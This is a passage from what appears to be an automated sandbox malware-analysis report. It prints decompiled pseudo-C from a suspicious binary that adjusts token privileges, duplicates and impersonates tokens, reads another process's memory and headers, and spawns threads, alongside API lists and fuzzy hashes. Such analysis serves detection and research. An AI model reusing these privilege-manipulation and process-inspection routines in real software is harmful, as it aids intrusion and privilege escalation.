                          										 *_t17 =  *(_t178 + 0x58) + 1;
                          										__eflags =  *_t17;
                          									}
                          									_t295 = 0xffffffffffffffff;
                          									_t261 = 1;
                          									L55:
                          									if(_t261 == 0 ||  *0x6f9c24 > 0x31) {
                          										goto L66;
                          									} else {
                          										 *((intOrPtr*)(_t286 + 0x18)) =  *((intOrPtr*)(_t303 + 0xf8));
                          										 *(_t303 + 8) = _t282;
                          										_t207 = E006EB7A0( *( *(_t303 + 4)));
                          										_t303 = _t303 + 4;
                          										 *(_t303 + 8) = _t207;
                          										_t178 = CreateThread(0, 0, E006F13A0, _t286, 0, _t303 + 0x18);
                          										if( *(_t303 + 4) == 0) {
                          											L65:
                          											_t286 = 0;
                          											goto L66;
                          										}
                          										_t211 =  *( *(_t301 + 4) + _t246 * 4);
                          										_t262 =  *( *( *(_t301 + 4) + _t246 * 4) + 0x50);
                          										if(_t295 < 0 || _t295 >= _t262) {
                          											_t212 = E006E3180(8 + _t262 * 8,  *((intOrPtr*)(_t211 + 0x4c)));
                          											_t303 = _t303 + 8;
                          											__eflags = _t212;
                          											if(_t212 == 0) {
                          												goto L63;
                          											}
                          											_t289 = _t212;
                          											 *(_t289 +  *( *( *(_t301 + 4) + _t246 * 4) + 0x50) * 8) =  *(_t303 + 8);
                          											_t216 = E006F4E70();
                          											_t265 =  *(_t301 + 4);
                          											_t283 =  *(_t265 + _t246 * 4);
                          											 *((intOrPtr*)(_t289 + 4 +  *(_t283 + 0x50) * 8)) = _t216;
                          											 *(_t283 + 0x4c) = _t289;
                          											_t178 =  *(_t265 + _t246 * 4);
                          											 *((intOrPtr*)(_t178 + 0x50)) =  *((intOrPtr*)(_t178 + 0x50)) + 1;
                          										} else {
                          											 *((intOrPtr*)( *((intOrPtr*)( *( *(_t301 + 4) + _t246 * 4) + 0x4c)) + 4 + _t295 * 8)) = E006F4E70();
                          											L63:
                          											_t178 =  *(_t303 + 8);
                          											if(_t178 != 0) {
                          												_t178 = E006E91E0(_t178);
                          												_t303 = _t303 + 4;
                          											}
                          										}
                          										goto L65;
                          									}
                          								}
                          								_t298 =  *((intOrPtr*)(_t178 + 0x54));
                          								_t281 = 0;
                          								__eflags = 0;
                          								while(1) {
                          									_t178 =  *(_t303 + 8);
                          									__eflags =  *((intOrPtr*)(_t298 + _t281 * 4)) - _t178;
                          									if( *((intOrPtr*)(_t298 + _t281 * 4)) == _t178) {
                          										goto L3;
                          									}
                          									_t281 = _t281 + 1;
                          									__eflags = _t281 - _t258;
                          									if(_t281 < _t258) {
                          										continue;
                          									}
                          									goto L3;
                          								}
                          								goto L3;
                          							}
                          							E006F4520(_t303 + 0x20, 0x6a);
                          							_t303 = _t303 + 8;
                          							_t222 = lstrcmpiW( *_t293, _t303 + 0x1c);
                          							_t301 =  *_t303;
                          							if(_t222 == 0) {
                          								L27:
                          								_t295 = 0;
                          								_t271 =  *( *(_t301 + 4) + _t246 * 4);
                          								_t224 =  *(_t271 + 0x50);
                          								if(_t224 <= 0) {
                          									L51:
                          									if(_t295 >= _t224) {
                          										_t178 = 1;
                          										__eflags = 1;
                          										_t261 = 1;
                          									} else {
                          										_t261 = 0 | E006F4E70() -  *((intOrPtr*)( *((intOrPtr*)( *( *(_t301 + 4) + _t246 * 4) + 0x4c)) + 4 + _t295 * 8)) - 0x00000707 > 0x00000000;
                          										_t178 = 1;
                          									}
                          									_t282 = _t178;
                          									goto L55;
                          								}
                          								while(lstrcmpiW( *( *((intOrPtr*)(_t271 + 0x4c)) + _t295 * 8),  *( *(_t303 + 4))) != 0) {
                          									_t295 = _t295 + 1;
                          									_t271 =  *( *(_t301 + 4) + _t246 * 4);
                          									_t224 =  *(_t271 + 0x50);
                          									if(_t295 < _t224) {
                          										continue;
                          									}
                          									goto L51;
                          								}
                          								_t224 =  *( *( *(_t301 + 4) + _t246 * 4) + 0x50);
                          								goto L51;
                          							}
                          							 *(_t303 + 0x1c) = 0x44;
                          							_t178 = lstrcmpiW( *( *(_t303 + 8)), _t303 + 0x1c);
                          							_t282 = 0;
                          							_t295 = 0xffffffff;
                          							_t261 = 1;
                          							if(_t178 != 0) {
                          								goto L55;
                          							}
                          							goto L27;
                          						}
                          						L66:
                          						_t243 = _t246 + 1;
                          						_t166 = _t178 & 0xffffff00 | _t286 == 0x00000000;
                          					} while (_t243 <  *_t301);
                          					if(_t286 != 0) {
                          						_t180 =  *_t286;
                          						if( *_t286 != 0) {
                          							E006E91E0(_t180);
                          							_t303 = _t303 + 4;
                          						}
                          						_t181 =  *(_t286 + 4);
                          						if( *(_t286 + 4) != 0) {
                          							E006E91E0(_t181);
                          							_t303 = _t303 + 4;
                          						}
                          						_t182 =  *(_t286 + 8);
                          						if( *(_t286 + 8) != 0) {
                          							E006E91E0(_t182);
                          							_t303 = _t303 + 4;
                          						}
                          						_t183 =  *(_t286 + 0x10);
                          						if( *(_t286 + 0x10) != 0) {
                          							E006E91E0(_t183);
                          							_t303 = _t303 + 4;
                          						}
                          						_t184 =  *((intOrPtr*)(_t286 + 0xc));
                          						if( *((intOrPtr*)(_t286 + 0xc)) != 0) {
                          							E006E91E0(_t184);
                          							_t303 = _t303 + 4;
                          						}
                          						E006E91E0(_t286);
                          					}
                          					goto L79;
                          				}
                          			}
                          0x006f1a7d
                          0x006f1f40
                          0x006f1f4d
                          0x006f1a83
                          0x006f1a83
                          0x006f1a85
                          0x006f1a87
                          0x006f1a89
                          0x006f1ae3
                          0x006f1ae5
                          0x006f1ae9
                          0x006f1b0f
                          0x006f1b11
                          0x006f1b13
                          0x006f1b16
                          0x006f1b1b
                          0x006f1b1b
                          0x006f1b1e
                          0x006f1b21
                          0x006f1b23
                          0x006f1b26
                          0x006f1b2b
                          0x006f1b2b
                          0x006f1b2e
                          0x006f1b31
                          0x006f1b33
                          0x006f1b36
                          0x006f1b3b
                          0x006f1b3b
                          0x006f1b3e
                          0x006f1b41
                          0x006f1b43
                          0x006f1b46
                          0x006f1b4b
                          0x006f1b4b
                          0x006f1b4e
                          0x006f1b50
                          0x006f1b53
                          0x006f1b56
                          0x006f1b59
                          0x006f1b59
                          0x006f1b5c
                          0x006f1b5e
                          0x006f1b61
                          0x006f1b65
                          0x006f1b69
                          0x006f1b6b
                          0x006f1b6e
                          0x006f1b73
                          0x006f1b73
                          0x006f1b76
                          0x006f1b78
                          0x006f1aeb
                          0x006f1aef
                          0x006f1af4
                          0x006f1af7
                          0x006f1af9
                          0x006f1af9
                          0x006f1aff
                          0x006f1b02
                          0x006f1b06
                          0x006f1b06
                          0x006f1b09
                          0x006f1b09
                          0x006f1b7a
                          0x006f1b7f
                          0x006f1b83
                          0x006f1b86
                          0x006f1b89
                          0x006f1b8c
                          0x006f1b8f
                          0x006f1b92
                          0x006f1b95
                          0x006f1b9d
                          0x006f1ba8
                          0x006f1bb2
                          0x006f1bbc
                          0x006f1bbf
                          0x006f1cd5
                          0x006f1cda
                          0x006f1cdc
                          0x006f1d12
                          0x006f1d15
                          0x006f1d1c
                          0x006f1d1f
                          0x006f1d24
                          0x006f1d26
                          0x006f1d28
                          0x006f1d30
                          0x006f1d31
                          0x006f1d31
                          0x00000000
                          0x006f1d28
                          0x006f1cde
                          0x00000000
                          0x006f1bc5
                          0x006f1bc5
                          0x006f1bc6
                          0x006f1bcd
                          0x006f1bd1
                          0x006f1bd5
                          0x006f1bd7
                          0x006f1cea
                          0x006f1cee
                          0x006f1cf1
                          0x00000000
                          0x006f1cf1
                          0x006f1bdd
                          0x006f1be5
                          0x006f1bea
                          0x006f1bee
                          0x006f1bfe
                          0x006f1cfa
                          0x006f1cfd
                          0x006f1d03
                          0x006f1d04
                          0x006f1d09
                          0x00000000
                          0x006f1d09
                          0x006f1c0a
                          0x006f1c0f
                          0x006f1c15
                          0x006f1c17
                          0x006f1c1b
                          0x006f1c21
                          0x006f1d3b
                          0x006f1d40
                          0x006f1d41
                          0x006f1d48
                          0x006f1d4a
                          0x006f1d4d
                          0x00000000
                          0x006f1d4d
                          0x006f1c31
                          0x006f1c36
                          0x006f1c44
                          0x006f1d58
                          0x006f1d5a
                          0x006f1d5c
                          0x006f1ce2
                          0x006f1ce2
                          0x00000000
                          0x006f1ce2
                          0x006f1d5e
                          0x006f1d61
                          0x00000000
                          0x00000000
                          0x006f1d67
                          0x006f1d6c
                          0x006f1d6c
                          0x006f1d6d
                          0x006f1d6d
                          0x006f1d6d
                          0x006f1d70
                          0x006f1d76
                          0x00000000
                          0x00000000
                          0x006f1d7b
                          0x006f1d7d
                          0x006f1d7f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x006f1d7f
                          0x006f1d81
                          0x006f1d84
                          0x006f1d8a
                          0x00000000
                          0x00000000
                          0x006f1d93
                          0x006f1d98
                          0x006f1d9b
                          0x006f1da2
                          0x006f1da5
                          0x006f1da8
                          0x006f1dac
                          0x006f1dae
                          0x006f1a8e
                          0x006f1a8e
                          0x006f1a90
                          0x006f1a90
                          0x006f1a92
                          0x00000000
                          0x00000000
                          0x006f1aa7
                          0x006f1aac
                          0x006f1aaf
                          0x006f1ab1
                          0x006f1ab3
                          0x006f1ab5
                          0x006f1ab8
                          0x006f1abb
                          0x006f1ac6
                          0x006f1ac9
                          0x006f1ad0
                          0x006f1ad2
                          0x006f1ad5
                          0x006f1ad5
                          0x006f1ad5
                          0x006f1ad5
                          0x006f1ada
                          0x006f1add
                          0x006f1e05
                          0x006f1e07
                          0x00000000
                          0x006f1e1a
                          0x006f1e21
                          0x006f1e2a
                          0x006f1e2e
                          0x006f1e33
                          0x006f1e36
                          0x006f1e4a
                          0x006f1e55
                          0x006f1ed3
                          0x006f1ed3
                          0x00000000
                          0x006f1ed3
                          0x006f1e5c
                          0x006f1e5f
                          0x006f1e62
                          0x006f1e87
                          0x006f1e8c
                          0x006f1e8f
                          0x006f1e91
                          0x00000000
                          0x00000000
                          0x006f1e93
                          0x006f1ea2
                          0x006f1ea5
                          0x006f1eaa
                          0x006f1ead
                          0x006f1eb3
                          0x006f1eb7
                          0x006f1eba
                          0x006f1ebd
                          0x006f1e68
                          0x006f1e76
                          0x006f1ec2
                          0x006f1ec2
                          0x006f1ec8
                          0x006f1ecb
                          0x006f1ed0
                          0x006f1ed0
                          0x006f1ec8
                          0x00000000
                          0x006f1e62
                          0x006f1e07
                          0x006f1db4
                          0x006f1db7
                          0x006f1db7
                          0x006f1db9
                          0x006f1db9
                          0x006f1dbd
                          0x006f1dc0
                          0x00000000
                          0x00000000
                          0x006f1dc6

                          APIs
                          • lstrcmpiW.KERNEL32(?,?,00000014,0000000C), ref: 006F1BFA
                          • lstrcmpiW.KERNEL32(?,?), ref: 006F1C15
                            • Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                            • Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                          • lstrcmpiW.KERNEL32(?,?), ref: 006F1C40
                          • lstrcmpiW.KERNEL32(?,?), ref: 006F1C60
                          • lstrcmpiW.KERNEL32(?,?), ref: 006F1C7B
                          • lstrcmpiW.KERNEL32(?,?), ref: 006F1CB4
                          • CreateThread.KERNEL32(00000000,00000000,006F13A0,?,00000000,?), ref: 006F1E4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: lstrcmpi$Heap$AllocateCreateProcessThread
                          • String ID: D
                          • API String ID: 4198123405-2746444292
                          • Opcode ID: d88271703f89e8d8aad688e29102cc87d933105758ad3385caa03b7b81011480
                          • Instruction ID: e6269c079b698695564c052951517b15e5c5af3f54ea9fbeef15a6b5d7224656
                          • Opcode Fuzzy Hash: d88271703f89e8d8aad688e29102cc87d933105758ad3385caa03b7b81011480
                          • Instruction Fuzzy Hash: 37E19DB5A0430AEFD714DF29C881A6AB7EABF85384F04442CEA45CB352EB31ED15CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 54%
                          			E006E8CD0(void* __ecx) {
                          				void** _v12;
                          				char _v204;
                          				struct _LUID _v216;
                          				char _v220;
                          				struct _TOKEN_PRIVILEGES _v236;
                          				long _v240;
                          				int _v244;
                          				char _v248;
                          				void* _v252;
                          				void* _v256;
                          				int _v260;
                          				void* _v268;
                          				intOrPtr _v276;
                          				intOrPtr* _t29;
                          				intOrPtr* _t30;
                          				void* _t31;
                          				intOrPtr _t34;
                          				void* _t43;
                          				intOrPtr* _t44;
                          				struct _TOKEN_PRIVILEGES* _t49;
                          				intOrPtr* _t58;
                          				void* _t62;
                          				intOrPtr _t64;
                          				WCHAR* _t68;
                          				HANDLE* _t69;
                          				intOrPtr _t71;
                          
                          				_t69 =  &_v256;
                          				_v252 = 0xffffffff;
                          				_t71 =  *0x6f9c00; // 0x73e71f81
                          				_v244 = 0;
                          				_v256 = 0;
                          				_v248 = 0;
                          				_v260 = 0;
                          				if(_t71 != 0) {
                          					L2:
                          					_v240 = 0;
                          					if(OpenProcessToken(GetCurrentProcess(), 0x28, _t69) != 0) {
                          						_t68 =  &_v204;
                          						E006F4520(_t68, 0x5f);
                          						if(LookupPrivilegeValueW(0, _t68,  &_v216) != 0) {
                          							_t49 =  &_v220;
                          							_t49->PrivilegeCount = 1;
                          							_t49->Privileges[0].Luid = 2;
                          							AdjustTokenPrivileges(_v260, 0, _t49, 0x10,  &_v236,  &_v240);
                          						}
                          					}
                          					_t29 =  *0x6f9c4c; // 0x73e74023
                          					if(_t29 == 0) {
                          						L16:
                          						_t30 =  *0x6f9b80; // 0x0
                          						if(_t30 == 0) {
                          							L21:
                          							_t31 = _v260;
                          							if(_t31 == 0) {
                          								L23:
                          								return _t31;
                          							}
                          							AdjustTokenPrivileges(_t31, 0,  &_v236, 0x10, 0, 0);
                          							return CloseHandle(_v260);
                          						}
                          						_t34 =  *_t30();
                          						_t64 = _t34;
                          						if(_t34 == 0xffffffff) {
                          							goto L21;
                          						}
                          						L18:
                          						RevertToSelf();
                          						_push( &_v252);
                          						_push(_t64);
                          						if( *0x6f9c00() != 0 && DuplicateTokenEx(_v260, 0x2000000, 0, 1, 1,  &_v252) != 0) {
                          							CloseHandle(_v268);
                          							 *_v12 = _v260;
                          						}
                          						goto L21;
                          					}
                          					_push( &_v248);
                          					_push( &_v256);
                          					_push(1);
                          					_push(0);
                          					_push(0);
                          					if( *_t29() == 0) {
                          						goto L16;
                          					}
                          					_t43 = _v268;
                          					_t64 = 0xffffffffffffffff;
                          					if(_t43 == 0) {
                          						L13:
                          						_t44 =  *0x6f9be8; // 0x73e71b65
                          						if(_t44 != 0) {
                          							 *_t44(_v276);
                          						}
                          						if(_t64 != 0xffffffff) {
                          							goto L18;
                          						} else {
                          							goto L16;
                          						}
                          					}
                          					_t62 = 0;
                          					_t58 = _v276 + 8;
                          					while( *_t58 != 0) {
                          						_t62 = _t62 + 1;
                          						_t58 = _t58 + 0xc;
                          						if(_t62 < _t43) {
                          							continue;
                          						}
                          						goto L13;
                          					}
                          					_t64 =  *((intOrPtr*)(_t58 - 8));
                          					goto L13;
                          				}
                          				_t31 = E006F18C0(__ecx, _t71);
                          				if(_t31 == 0) {
                          					goto L23;
                          				}
                          				goto L2;
                          			}

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 006E8D0D
                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 006E8D19
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E8D3A
                          • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 006E8D68
                          • RevertToSelf.ADVAPI32 ref: 006E8DD9
                          • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 006E8E04
                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 006E8E19
                            • Part of subcall function 006F18C0: LoadLibraryW.KERNEL32(?), ref: 006F18DC
                            • Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F18FD
                            • Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1911
                            • Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1925
                            • Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1939
                          • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,00000000,00000000), ref: 006E8E39
                          • CloseHandle.KERNEL32 ref: 006E8E42
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: AddressProcToken$AdjustCloseHandlePrivilegesProcess$CurrentDuplicateLibraryLoadLookupOpenPrivilegeRevertSelfValue
                          • String ID:
                          • API String ID: 1504140195-0
                          • Opcode ID: 3deed42daf808f47cc89e5a8f8c5f9ebb9548f891df5752acad236164fd4b69f
                          • Instruction ID: 06014b9fde9fc0a1f32d3923b0f198a0070932032434291c8b11ee7d9a7e789e
                          • Opcode Fuzzy Hash: 3deed42daf808f47cc89e5a8f8c5f9ebb9548f891df5752acad236164fd4b69f
                          • Instruction Fuzzy Hash: 52413A70205342AFE724DF61DC09BAA7BEAEF84750F00491CB599D72E0EB70D845CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006F1800(void* _a4) {
                          				intOrPtr _v236;
                          				long _v276;
                          				intOrPtr _v280;
                          				void _v340;
                          				void _v348;
                          				void* _v360;
                          				void* _v372;
                          				void _v380;
                          				void* _t25;
                          				DWORD* _t28;
                          				void* _t29;
                          				union _PROCESSINFOCLASS _t30;
                          				DWORD* _t32;
                          
                          				_t29 = _a4;
                          				_t30 = 0;
                          				if(NtQueryInformationProcess(_t29, 0,  &_v348, 0x18, 0) >= 0) {
                          					_t25 =  &_v276;
                          					 *_t25 = 0;
                          					if(ReadProcessMemory(_t29, _v360,  &_v380, 0x10, _t25) != 0 && _v276 == 0x10) {
                          						_v276 = 0;
                          						if(ReadProcessMemory(_t29, _v372,  &_v340, 0x40, _t25) != 0 && _v276 == 0x40) {
                          							_t28 = _t32;
                          							 *_t28 = 0;
                          							if(ReadProcessMemory(_t29, _v372 + _v280, _t25, 0xf8, _t28) != 0 &&  *_t32 == 0xf8) {
                          								_t30 = _v372 + _v236;
                          							}
                          						}
                          					}
                          				}
                          				return _t30;
                          			}

                          APIs
                          • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 006F181C
                          • ReadProcessMemory.KERNEL32(?,?,?,00000010,?), ref: 006F1842
                          • ReadProcessMemory.KERNEL32(?,?,?,00000040,?), ref: 006F1869
                          • ReadProcessMemory.KERNEL32(?,?,?,000000F8), ref: 006F1893
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Process$MemoryRead$InformationQuery
                          • String ID: @
                          • API String ID: 3059065599-2766056989
                          • Opcode ID: 5f94ef4c783476edeee355da09100aa9ebb030eb658e16a539ad8fbcf69da103
                          • Instruction ID: 53873b1e3f57043a97c50038fb36dd6f151faf0149bc0d3815f174ef36386e70
                          • Opcode Fuzzy Hash: 5f94ef4c783476edeee355da09100aa9ebb030eb658e16a539ad8fbcf69da103
                          • Instruction Fuzzy Hash: 7B112C71604305AFF720CB15DC84FBB7BEDEB85799F008518FA659A280D770A804DB76
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E006E4DE0(signed int __ecx) {
                          				intOrPtr _t91;
                          				signed int _t98;
                          				signed int _t100;
                          				intOrPtr _t102;
                          				signed int _t105;
                          				signed int _t107;
                          				intOrPtr _t108;
                          				signed int _t109;
                          				signed int _t110;
                          				signed int _t111;
                          				signed int _t114;
                          				intOrPtr _t115;
                          				signed int _t118;
                          				signed int _t119;
                          				signed int _t122;
                          				signed int _t123;
                          				signed int _t125;
                          				signed int _t129;
                          				intOrPtr _t130;
                          				intOrPtr _t132;
                          				signed int _t133;
                          				signed int _t137;
                          				signed int _t138;
                          				signed int _t140;
                          				signed int _t144;
                          				signed int _t146;
                          				signed int _t147;
                          				signed int _t148;
                          				signed int _t149;
                          				signed int _t151;
                          				signed int _t153;
                          				signed int _t155;
                          				signed int _t158;
                          				signed int _t159;
                          				signed int _t160;
                          				signed int _t161;
                          				signed int _t162;
                          				signed int _t166;
                          				signed int _t167;
                          				signed int _t168;
                          				signed int _t169;
                          				signed int* _t172;
                          				signed int* _t174;
                          				signed int* _t175;
                          				signed int* _t176;
                          				signed int* _t177;
                          
                          				_t91 =  *0x6f9b0c; // 0x2ef350
                          				_t153 = 0;
                          				_t167 = __ecx;
                          				_t172[1] = 0;
                          				_t172[3] = 0;
                          				_t172[5] = 0;
                          				 *(_t91 + 8) = 6;
                          				_t5 = _t91 + 0x24; // 0x0
                          				_t132 =  *_t5;
                          				if(_t132 == 0) {
                          					 *(_t91 + 8) = 2;
                          					_t129 = 0;
                          					goto L15;
                          				} else {
                          					_t98 = 0xfffffffe;
                          					_t155 = 1;
                          					while( *((short*)(_t132 + _t155 * 2 - 2)) != 0) {
                          						_t155 = _t155 + 1;
                          						_t98 = _t98 + 0xfffffffe;
                          						if(_t155 != 0x80000000) {
                          							continue;
                          						}
                          						_t129 = 0;
                          						_t166 = 0;
                          						_t153 = 0;
                          						L24:
                          						_t92 = _t172[1];
                          						if(_t172[1] != 0) {
                          							E006E91E0(_t92);
                          							_t172 =  &(_t172[1]);
                          						}
                          						if(_t153 != 0) {
                          							E006E91E0(_t166);
                          							_t172 =  &(_t172[1]);
                          						}
                          						_t93 = _t172[3];
                          						if(_t172[3] != 0) {
                          							E006E91E0(_t93);
                          						}
                          						return _t129;
                          					}
                          					_t129 = 0;
                          					_t100 = E006E3180( ~_t98, 0);
                          					_t172 =  &(_t172[2]);
                          					_t166 = _t100;
                          					__eflags = _t100;
                          					if(_t100 == 0) {
                          						_t153 = _t166;
                          						L15:
                          						_t166 = 0;
                          						goto L24;
                          					}
                          					__eflags = _t155;
                          					if(_t155 <= 0) {
                          						_t129 = 0;
                          						__eflags = _t155;
                          						if(_t155 != 0) {
                          							 *_t166 = 0;
                          						}
                          						L23:
                          						_t153 = _t166;
                          						goto L24;
                          					}
                          					_t10 = _t155 - 1; // 0x0
                          					_t133 = 0;
                          					_t144 = 2;
                          					_t172[6] = _t167;
                          					_t172[2] = _t10;
                          					_t102 =  *0x6f9b0c; // 0x2ef350
                          					_t13 = _t102 + 0x24; // 0x0
                          					_t130 =  *_t13;
                          					_t172[4] = 1;
                          					_t105 = 0;
                          					__eflags = 0;
                          					while(1) {
                          						_t168 =  *(_t130 + _t105 * 2) & 0x0000ffff;
                          						__eflags = _t168;
                          						if(_t168 == 0) {
                          							break;
                          						}
                          						 *(_t166 + _t105 * 2) = _t168;
                          						_t144 = _t144 + 0xfffffffe;
                          						_t133 = _t133 + 0xfffffffe;
                          						__eflags = _t155 - 1;
                          						_t155 = _t155 - 1;
                          						if(__eflags == 0) {
                          							L12:
                          							__eflags = _t155;
                          							_t143 =  ==  ?  ~_t144 :  ~_t133;
                          							 *((short*)(_t166 + ( ==  ?  ~_t144 :  ~_t133))) = 0;
                          							if(_t155 != 0) {
                          								L19:
                          								_t169 = _t172[6];
                          								_t107 = E006F08A0( &(_t172[5]), _t166, _t172[4],  &(_t172[3]),  &(_t172[5]));
                          								__eflags = _t107;
                          								if(_t107 == 0) {
                          									L21:
                          									_t108 =  *0x6f9b0c; // 0x2ef350
                          									 *(_t108 + 8) = 2;
                          									L22:
                          									_t129 = 0;
                          									__eflags = 0;
                          									goto L23;
                          								}
                          								_t109 = _t172[5];
                          								__eflags = _t109 - 1 - 0x1fffe;
                          								if(_t109 - 1 < 0x1fffe) {
                          									_t110 = E006EC380(_t172[6], 0,  &(_t172[1]), _t109);
                          									_t172 =  &(_t172[4]);
                          									_t129 = 0;
                          									__eflags = _t110;
                          									if(_t110 == 0) {
                          										goto L23;
                          									}
                          									_t156 =  &(_t172[0x49]);
                          									_t111 = GetSystemDirectoryW( &(_t172[0x49]), 0x104);
                          									__eflags = _t111;
                          									if(_t111 == 0) {
                          										goto L23;
                          									}
                          									 *((intOrPtr*)(_t172 + 0x124 + _t111 * 2)) = 0x5c;
                          									E006F4520(_t172 + 0x126 + _t111 * 2, 0x5c);
                          									_t174 =  &(_t172[2]);
                          									__eflags =  *0x6f9ae8;
                          									if( *0x6f9ae8 == 0) {
                          										L58:
                          										_t114 = E006F6E60(0, _t156, _t174[1]);
                          										_t172 =  &(_t174[3]);
                          										__eflags = _t114;
                          										_t172[4] = _t114;
                          										if(_t114 == 0) {
                          											goto L23;
                          										}
                          										L59:
                          										_t115 =  *0x6f9b0c; // 0x2ef350
                          										 *((intOrPtr*)(_t115 + 8)) = 1;
                          										E006F4520( &(_t172[9]), 0x5e);
                          										_t175 =  &(_t172[2]);
                          										_push(_t175[1]);
                          										E006F4610(_t169, 0xe,  &(_t172[9]));
                          										_t172 =  &(_t175[4]);
                          										_t129 = _t172[4];
                          										goto L23;
                          									}
                          									_t158 = 0xfffffc00;
                          									_t118 = E006E3180(0x800, 0);
                          									_t176 =  &(_t174[2]);
                          									_t146 = _t118;
                          									while(1) {
                          										_t137 =  *(_t176 + 0x924 + _t158 * 2) & 0x0000ffff;
                          										_t119 = _t158;
                          										__eflags = _t137;
                          										if(_t137 == 0) {
                          											break;
                          										}
                          										 *(_t146 + 0x800 + _t119 * 2) = _t137;
                          										_t158 = _t119 + 1;
                          										__eflags = _t158;
                          										if(_t158 != 0) {
                          											continue;
                          										}
                          										 *(_t146 + 0x800 + _t119 * 2) = 0;
                          										L54:
                          										_t162 = 0;
                          										__eflags = 0;
                          										L55:
                          										__eflags = _t147;
                          										if(_t147 != 0) {
                          											E006E91E0(_t147);
                          											_t172 =  &(_t172[1]);
                          										}
                          										__eflags = _t162;
                          										_t156 =  &(_t172[0x49]);
                          										if(_t162 != 0) {
                          											goto L59;
                          										} else {
                          											goto L58;
                          										}
                          									}
                          									 *(_t146 + 0x800 + _t119 * 2) = 0;
                          									_t176[2] = _t146;
                          									E006F4520( &(_t176[9]), 0x5d);
                          									_t147 = _t176[2];
                          									_t177 =  &(_t176[2]);
                          									_t122 = 0x400;
                          									_t138 = _t147;
                          									while(1) {
                          										__eflags =  *_t138;
                          										if( *_t138 == 0) {
                          											break;
                          										}
                          										_t138 = _t138 + 2;
                          										_t122 = _t122 - 1;
                          										__eflags = _t122;
                          										if(_t122 != 0) {
                          											continue;
                          										}
                          										L46:
                          										_t123 = 0x400;
                          										_t177[2] = _t177[1];
                          										_t140 = _t147;
                          										while(1) {
                          											__eflags =  *_t140;
                          											if( *_t140 == 0) {
                          												break;
                          											}
                          											_t140 = _t140 + 2;
                          											_t123 = _t123 - 1;
                          											__eflags = _t123;
                          											if(_t123 != 0) {
                          												continue;
                          											}
                          											goto L54;
                          										}
                          										_t149 = 0;
                          										__eflags = 0;
                          										while(1) {
                          											_t161 = _t149;
                          											_t151 =  *(_t177[2] + _t161 * 2) & 0x0000ffff;
                          											__eflags = _t151;
                          											if(_t151 == 0) {
                          												break;
                          											}
                          											 *(_t140 + _t161 * 2) = _t151;
                          											_t73 = _t161 + 1; // 0x1
                          											_t149 = _t73;
                          											__eflags = _t123 - _t149;
                          											if(_t123 != _t149) {
                          												continue;
                          											}
                          											_t147 =  *_t177;
                          											 *(_t140 + _t161 * 2) = 0;
                          											goto L54;
                          										}
                          										 *(_t140 + _t161 * 2) = 0;
                          										_t162 = 0;
                          										_push(0);
                          										_push(0);
                          										_push(0x420);
                          										_push(_t177[3]);
                          										_push( &(_t177[7]));
                          										_t125 = E006E5470( &(_t177[8]));
                          										_t147 = _t177[6];
                          										_t172 =  &(_t177[6]);
                          										__eflags = _t125;
                          										if(_t125 != 0) {
                          											CloseHandle(_t172[8]);
                          											CloseHandle(_t172[7]);
                          											_t147 =  *_t172;
                          											_t162 = 1;
                          										}
                          										goto L55;
                          									}
                          									_t159 = 0;
                          									__eflags = 0;
                          									while(1) {
                          										_t148 = _t159;
                          										_t160 =  *(_t177 + 0x24 + _t159 * 2) & 0x0000ffff;
                          										__eflags = _t160;
                          										if(_t160 == 0) {
                          											break;
                          										}
                          										 *(_t138 + _t148 * 2) = _t160;
                          										_t63 = _t148 + 1; // 0x1
                          										_t159 = _t63;
                          										__eflags = _t122 - _t159;
                          										if(_t122 != _t159) {
                          											continue;
                          										}
                          										break;
                          									}
                          									 *(_t138 + _t148 * 2) = 0;
                          									_t147 =  *_t177;
                          									goto L46;
                          								}
                          								goto L21;
                          							}
                          							goto L22;
                          						}
                          						__eflags = _t105 - 0x7ffffffd;
